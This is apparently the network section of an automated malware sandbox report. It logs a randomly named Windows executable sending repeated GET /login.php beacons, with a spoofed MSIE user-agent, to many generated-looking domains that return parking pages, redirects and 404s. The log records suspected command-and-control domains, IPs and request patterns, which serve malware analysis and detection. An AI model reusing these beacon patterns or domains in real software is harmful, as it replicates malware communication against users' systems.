                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:08:26.819760084 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            67192.168.2.96262344.221.84.105801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.081897974 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.510899067 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344909|1731344858|25|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            68192.168.2.96262475.2.71.199801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106256962 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.523556948 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            69192.168.2.962625199.59.243.227801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106554031 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.522852898 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: fc5b29c8-0188-4bf7-8849-fa3bd61e138c
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:29 GMT
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.522900105 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0OTA5LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            70192.168.2.96262644.221.84.10580
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106669903 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vocyzit.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.525649071 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344909|1731344858|25|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            71192.168.2.962627208.100.26.245801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106754065 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.547198057 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            72192.168.2.962628188.114.96.3801756C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.117264986 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.794085979 CET966INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:29 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuX8b2fxJu6aId1g1ONlp2lCTJGkYDGyQKJXSFgNmds3zsjyjYXiz7HJkRBYUvfMTzk%2BG0fsf789Ozs%2BsfgE0lFie5HoYQexW5Tu2SuWv8K7dSAlNZzaG4XGKsoMWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe2745bdf4249-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1153&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            73192.168.2.96263423.253.46.64801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645968914 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100305080 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100322962 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            74192.168.2.96263875.2.71.199803964C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632031918 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.987322092 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Location: https://puzylyp.com/login.php
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:33 GMT
                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            75192.168.2.96263744.221.84.105803964C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632278919 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.983376980 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:33 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344913|1731344858|15|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            76192.168.2.96264444.221.84.10580
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.897934914 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.313124895 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:34 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344914|1731344858|16|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            77192.168.2.96264523.253.46.6480
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.904076099 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.358036041 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:28 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
